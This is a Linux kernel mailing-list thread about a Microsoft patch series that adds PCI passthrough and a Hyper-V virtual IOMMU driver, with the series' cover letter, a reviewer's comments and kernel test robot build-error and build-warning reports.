hv_iommu_map_pgs(hvdom, iova, paddr, remain, + map_flags); + + completed = hv_repcomp(status); + done = done + completed; + iova = iova + (completed << HV_HYP_PAGE_SHIFT); + paddr = paddr + (completed << HV_HYP_PAGE_SHIFT); + + if (hv_result(status) == HV_STATUS_INSUFFICIENT_MEMORY) { + ret = hv_call_deposit_pages(NUMA_NO_NODE, + hv_current_partition_id, + 256); + if (ret) + break; + } + if (!hv_result_success(status)) + break; + } + + if (!hv_result_success(status)) { + size_t done_size = done << HV_HYP_PAGE_SHIFT; + + hv_status_err(status, "pgs:%lx/%lx iova:%lx\n", + done, npages, iova); + /* + * lookup tree has all mappings [0 - size-1]. Below unmap will + * only remove from [0 - done], we need to remove second chunk + * [done+1 - size-1]. + */ + hv_iommu_del_tree_mappings(hvdom, iova, size - done_size); + hv_iommu_unmap_pages(immdom, iova - done_size, pgsize, + done, NULL); + if (mapped) + *mapped = 0; + } else + if (mapped) + *mapped = size; + + return hv_result_to_errno(status); +} + +static size_t hv_iommu_unmap_pages(struct iommu_domain *immdom, ulong iova, + size_t pgsize, size_t pgcount, + struct iommu_iotlb_gather *gather) +{ + unsigned long flags, npages; + struct hv_input_unmap_device_gpa_pages *input; + u64 status; + struct hv_domain *hvdom = to_hv_domain(immdom); + size_t unmapped, size = pgsize * pgcount; + + unmapped = hv_iommu_del_tree_mappings(hvdom, iova, size); + if (unmapped < size) + pr_err("%s: could not delete all mappings (%lx:%lx/%lx)\n", + __func__, iova, unmapped, size); + + if (hvdom->attached_dom) + return size; + + npages = size >> HV_HYP_PAGE_SHIFT; + + local_irq_save(flags); + input = *this_cpu_ptr(hyperv_pcpu_input_arg); + memset(input, 0, sizeof(*input)); + + input->device_domain.partition_id = HV_PARTITION_ID_SELF; + input->device_domain.domain_id.type = HV_DEVICE_DOMAIN_TYPE_S2; + input->device_domain.domain_id.id = hvdom->domid_num; + input->target_device_va_base = iova; + + status = hv_do_rep_hypercall(HVCALL_UNMAP_DEVICE_GPA_PAGES, npages, + 0, input, NULL); + local_irq_restore(flags); + + if (!hv_result_success(status)) + hv_status_err(status, "\n"); + + return unmapped; +} + +static phys_addr_t hv_iommu_iova_to_phys(struct iommu_domain *immdom, + dma_addr_t iova) +{ + u64 paddr = 0; + unsigned long flags; + struct hv_iommu_mapping *mapping; + struct interval_tree_node *node; + struct hv_domain *hvdom = to_hv_domain(immdom); + + spin_lock_irqsave(&hvdom->mappings_lock, flags); + node = interval_tree_iter_first(&hvdom->mappings_tree, iova, iova); + if (node) { + mapping = container_of(node, struct hv_iommu_mapping, iova); + paddr = mapping->paddr + (iova - mapping->iova.start); + } + spin_unlock_irqrestore(&hvdom->mappings_lock, flags); + + return paddr; +} + +/* + * Currently, hypervisor does not provide list of devices it is using + * dynamically. So use this to allow users to manually specify devices that + * should be skipped. (eg. hypervisor debugger using some network device). + */ +static struct iommu_device *hv_iommu_probe_device(struct device *dev) +{ + if (!dev_is_pci(dev)) + return ERR_PTR(-ENODEV); + + if (pci_devs_to_skip && *pci_devs_to_skip) { + int rc, pos = 0; + int parsed; + int segment, bus, slot, func; + struct pci_dev *pdev = to_pci_dev(dev); + + do { + parsed = 0; + + rc = sscanf(pci_devs_to_skip + pos, " (%x:%x:%x.%x) %n", + &segment, &bus, &slot, &func, &parsed); + if (rc) + break; + if (parsed <= 0) + break; + + if (pci_domain_nr(pdev->bus) == segment && + pdev->bus->number == bus && + PCI_SLOT(pdev->devfn) == slot && + PCI_FUNC(pdev->devfn) == func) { + + dev_info(dev, "skipped by Hyper-V IOMMU\n"); + return ERR_PTR(-ENODEV); + } + pos += parsed; + + } while (pci_devs_to_skip[pos]); + } + + /* Device will be explicitly attached to the default domain, so no need + * to do dev_iommu_priv_set() here. + */ + + return &hv_virt_iommu; +} + +static void hv_iommu_probe_finalize(struct device *dev) +{ + struct iommu_domain *immdom = iommu_get_domain_for_dev(dev); + + if (immdom && immdom->type == IOMMU_DOMAIN_DMA) + iommu_setup_dma_ops(dev); + else + set_dma_ops(dev, NULL); +} + +static void hv_iommu_release_device(struct device *dev) +{ + struct hv_domain *hvdom = dev_iommu_priv_get(dev); + + /* Need to detach device from device domain if necessary. */ + if (hvdom) + hv_iommu_detach_dev(&hvdom->iommu_dom, dev); + + dev_iommu_priv_set(dev, NULL); + set_dma_ops(dev, NULL); +} + +static struct iommu_group *hv_iommu_device_group(struct device *dev) +{ + if (dev_is_pci(dev)) + return pci_device_group(dev); + else + return generic_device_group(dev); +} + +static int hv_iommu_def_domain_type(struct device *dev) +{ + /* The hypervisor always creates this by default during boot */ + return IOMMU_DOMAIN_IDENTITY; +} + +static struct iommu_ops hv_iommu_ops = { + .capable = hv_iommu_capable, + .domain_alloc_identity = hv_iommu_domain_alloc_identity, + .domain_alloc_paging = hv_iommu_domain_alloc_paging, + .probe_device = hv_iommu_probe_device, + .probe_finalize = hv_iommu_probe_finalize, + .release_device = hv_iommu_release_device, + .def_domain_type = hv_iommu_def_domain_type, + .device_group = hv_iommu_device_group, + .default_domain_ops = &(const struct iommu_domain_ops) { + .attach_dev = hv_iommu_attach_dev, + .map_pages = hv_iommu_map_pages, + .unmap_pages = hv_iommu_unmap_pages, + .iova_to_phys = hv_iommu_iova_to_phys, + .free = hv_iommu_domain_free, + }, + .owner = THIS_MODULE, +}; + +static void __init hv_initialize_special_domains(void) +{ + hv_def_identity_dom.iommu_dom.geometry = default_geometry; + hv_def_identity_dom.domid_num = HV_DEVICE_DOMAIN_ID_S2_DEFAULT; /* 0 */ +} + +static int __init hv_iommu_init(void) +{ + int ret; + struct iommu_device *iommup = &hv_virt_iommu; + + if (!hv_is_hyperv_initialized()) + return -ENODEV; + + ret = iommu_device_sysfs_add(iommup, NULL, NULL, "%s", "hyperv-iommu"); + if (ret) { + pr_err("Hyper-V: iommu_device_sysfs_add failed: %d\n", ret); + return ret; + } + + /* This must come before iommu_device_register because the latter calls + * into the hooks. + */ + hv_initialize_special_domains(); + + ret = iommu_device_register(iommup, &hv_iommu_ops, NULL); + if (ret) { + pr_err("Hyper-V: iommu_device_register failed: %d\n", ret); + goto err_sysfs_remove; + } + + pr_info("Hyper-V IOMMU initialized\n"); + + return 0; + +err_sysfs_remove: + iommu_device_sysfs_remove(iommup); + return ret; +} + +void __init hv_iommu_detect(void) +{ + if (no_iommu || iommu_detected) + return; + + /* For l1vh, always expose an iommu unit */ + if (!hv_l1vh_partition()) + if (!(ms_hyperv.misc_features & HV_DEVICE_DOMAIN_AVAILABLE)) + return; + + iommu_detected = 1; + x86_init.iommu.iommu_init = hv_iommu_init; + + pci_request_acs(); +} diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h index dfc516c1c719..2ad111727e82 100644 --- a/include/linux/hyperv.h +++ b/include/linux/hyperv.h @@ -1767,4 +1767,10 @@ static inline unsigned long virt_to_hvpfn(void *addr) #define HVPFN_DOWN(x) ((x) >> HV_HYP_PAGE_SHIFT) #define page_to_hvpfn(page) (page_to_pfn(page) * NR_HV_HYP_PAGES_IN_PAGE) +#ifdef CONFIG_HYPERV_IOMMU +void __init hv_iommu_detect(void); +#else +static inline void hv_iommu_detect(void) { } +#endif /* CONFIG_HYPERV_IOMMU */ + #endif /* _HYPERV_H */ -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:27 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
On Mon, Jan 19, 2026 at 10:42:21PM -0800, Mukesh R wrote: There is a Linux standard for giving credits when code is adapted from. This doesn't follow that standard. Please fix. This put must be sync as device must be detached from domain before attempting partition destruction. This was explicitly mentioned in the patch originated this code. Please fix, add a comment and credits to the commit message. Thanks, Stanislav
{ "author": "Stanislav Kinsburskii <skinsburskii@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 08:09:02 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
On Mon, Jan 19, 2026 at 10:42:22PM -0800, Mukesh R wrote: Shouldn't the partition be put here? Thanks, Stanislav
{ "author": "Stanislav Kinsburskii <skinsburskii@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 08:13:55 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
Hi Mukesh, kernel test robot noticed the following build errors: [auto build test ERROR on tip/x86/core] [also build test ERROR on pci/next pci/for-linus arm64/for-next/core clk/clk-next soc/for-next linus/master arnd-asm-generic/master v6.19-rc6 next-20260119] [If your patch is applied to the wrong git tree, kindly drop us a note. And when submitting patch, we suggest to use '--base' as documented in https://git-scm.com/docs/git-format-patch#_base_tree_information] url: https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832 base: tip/x86/core patch link: https://lore.kernel.org/r/20260120064230.3602565-2-mrathor%40linux.microsoft.com patch subject: [PATCH v0 01/15] iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c config: i386-randconfig-001-20260120 (https://download.01.org/0day-ci/archive/20260121/202601210208.mg3YUkif-lkp@intel.com/config) compiler: gcc-14 (Debian 14.2.0-19) 14.2.0 reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210208.mg3YUkif-lkp@intel.com/reproduce) If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags | Reported-by: kernel test robot <lkp@intel.com> | Closes: https://lore.kernel.org/oe-kbuild-all/202601210208.mg3YUkif-lkp@intel.com/ All errors (new ones prefixed by >>): In file included from drivers/acpi/pci_root.c:20: 269 | __u128 irte; | ^~~~~~ | __u32 Kconfig warnings: (for reference only) WARNING: unmet direct dependencies detected for IRQ_REMAP Depends on [n]: IOMMU_SUPPORT [=y] && X86_64 [=n] && X86_IO_APIC [=y] && PCI_MSI [=n] && ACPI [=y] Selected by [y]: - HYPERV_IOMMU [=y] && IOMMU_SUPPORT [=y] && HYPERV [=y] && X86 [=y] vim +269 include/linux/dmar.h 2ae21010694e56 Suresh Siddha 2008-07-10 200 2ae21010694e56 Suresh Siddha 2008-07-10 201 struct irte { b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 202 union { b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 203 struct { 2ae21010694e56 Suresh Siddha 2008-07-10 204 union { 3bf17472226b00 Thomas Gleixner 2015-06-09 205 /* Shared between remapped and posted mode*/ 2ae21010694e56 Suresh Siddha 2008-07-10 206 struct { 3bf17472226b00 Thomas Gleixner 2015-06-09 207 __u64 present : 1, /* 0 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 208 fpd : 1, /* 1 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 209 __res0 : 6, /* 2 - 6 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 210 avail : 4, /* 8 - 11 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 211 __res1 : 3, /* 12 - 14 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 212 pst : 1, /* 15 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 213 vector : 8, /* 16 - 23 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 214 __res2 : 40; /* 24 - 63 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 215 }; 3bf17472226b00 Thomas Gleixner 2015-06-09 216 3bf17472226b00 Thomas Gleixner 2015-06-09 217 /* Remapped mode */ 3bf17472226b00 Thomas Gleixner 2015-06-09 218 struct { 3bf17472226b00 Thomas Gleixner 2015-06-09 219 __u64 r_present : 1, /* 0 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 220 r_fpd : 1, /* 1 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 221 dst_mode : 1, /* 2 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 222 redir_hint : 1, /* 3 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 223 trigger_mode : 1, /* 4 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 224 dlvry_mode : 3, /* 5 - 7 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 225 r_avail : 4, /* 8 - 11 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 226 r_res0 : 4, /* 12 - 15 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 227 r_vector : 8, /* 16 - 23 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 228 r_res1 : 8, /* 24 - 31 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 229 dest_id : 32; /* 32 - 63 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 230 }; 3bf17472226b00 Thomas Gleixner 2015-06-09 231 3bf17472226b00 Thomas Gleixner 2015-06-09 232 /* Posted mode */ 3bf17472226b00 Thomas Gleixner 2015-06-09 233 struct { 3bf17472226b00 Thomas Gleixner 2015-06-09 234 __u64 p_present : 1, /* 0 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 235 p_fpd : 1, /* 1 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 236 p_res0 : 6, /* 2 - 7 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 237 p_avail : 4, /* 8 - 11 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 238 p_res1 : 2, /* 12 - 13 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 239 p_urgent : 1, /* 14 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 240 p_pst : 1, /* 15 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 241 p_vector : 8, /* 16 - 23 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 242 p_res2 : 14, /* 24 - 37 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 243 pda_l : 26; /* 38 - 63 */ 2ae21010694e56 Suresh Siddha 2008-07-10 244 }; 2ae21010694e56 Suresh Siddha 2008-07-10 245 __u64 low; 2ae21010694e56 Suresh Siddha 2008-07-10 246 }; 2ae21010694e56 Suresh Siddha 2008-07-10 247 2ae21010694e56 Suresh Siddha 2008-07-10 248 union { 3bf17472226b00 Thomas Gleixner 2015-06-09 249 /* Shared between remapped and posted mode*/ 2ae21010694e56 Suresh Siddha 2008-07-10 250 struct { 3bf17472226b00 Thomas Gleixner 2015-06-09 251 __u64 sid : 16, /* 64 - 79 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 252 sq : 2, /* 80 - 81 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 253 svt : 2, /* 82 - 83 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 254 __res3 : 44; /* 84 - 127 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 255 }; 3bf17472226b00 Thomas Gleixner 2015-06-09 256 3bf17472226b00 Thomas Gleixner 2015-06-09 257 /* Posted mode*/ 3bf17472226b00 Thomas Gleixner 2015-06-09 258 struct { 3bf17472226b00 Thomas Gleixner 2015-06-09 259 __u64 p_sid : 16, /* 64 - 79 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 260 p_sq : 2, /* 80 - 81 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 261 p_svt : 2, /* 82 - 83 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 262 p_res3 : 12, /* 84 - 95 */ 3bf17472226b00 Thomas Gleixner 2015-06-09 263 pda_h : 32; /* 96 - 127 */ 2ae21010694e56 Suresh Siddha 2008-07-10 264 }; 2ae21010694e56 Suresh Siddha 2008-07-10 265 __u64 high; 2ae21010694e56 Suresh Siddha 2008-07-10 266 }; 2ae21010694e56 Suresh Siddha 2008-07-10 267 }; b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 268 #ifdef CONFIG_IRQ_REMAP b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 @269 __u128 irte; b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 270 #endif b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 271 }; b1fe7f2cda2a00 Peter Zijlstra 2023-05-31 272 }; 423f085952fd72 Thomas Gleixner 2010-10-10 273 -- 0-DAY CI Kernel Test Service https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 03:08:24 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
Hi Mukesh, kernel test robot noticed the following build warnings: [auto build test WARNING on tip/x86/core] [also build test WARNING on pci/next pci/for-linus arm64/for-next/core soc/for-next linus/master v6.19-rc6] [cannot apply to clk/clk-next arnd-asm-generic/master next-20260119] [If your patch is applied to the wrong git tree, kindly drop us a note. And when submitting patch, we suggest to use '--base' as documented in https://git-scm.com/docs/git-format-patch#_base_tree_information] url: https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832 base: tip/x86/core patch link: https://lore.kernel.org/r/20260120064230.3602565-16-mrathor%40linux.microsoft.com patch subject: [PATCH v0 15/15] mshv: Populate mmio mappings for PCI passthru config: x86_64-randconfig-003-20260120 (https://download.01.org/0day-ci/archive/20260121/202601210255.2ZZOLtMV-lkp@intel.com/config) compiler: gcc-14 (Debian 14.2.0-19) 14.2.0 reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210255.2ZZOLtMV-lkp@intel.com/reproduce) If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags | Reported-by: kernel test robot <lkp@intel.com> | Closes: https://lore.kernel.org/oe-kbuild-all/202601210255.2ZZOLtMV-lkp@intel.com/ All warnings (new ones prefixed by >>): 60 | static int __init setup_hv_full_mmio(char *str) | ^~~~~~~~~~~~~~~~~~ vim +/setup_hv_full_mmio +60 drivers/hv/mshv_root_main.c 58 59 bool hv_nofull_mmio; /* don't map entire mmio region upon fault */ > 60 static int __init setup_hv_full_mmio(char *str) 61 { 62 hv_nofull_mmio = true; 63 return 0; 64 } 65 __setup("hv_nofull_mmio", setup_hv_full_mmio); 66 -- 0-DAY CI Kernel Test Service https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 03:52:58 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
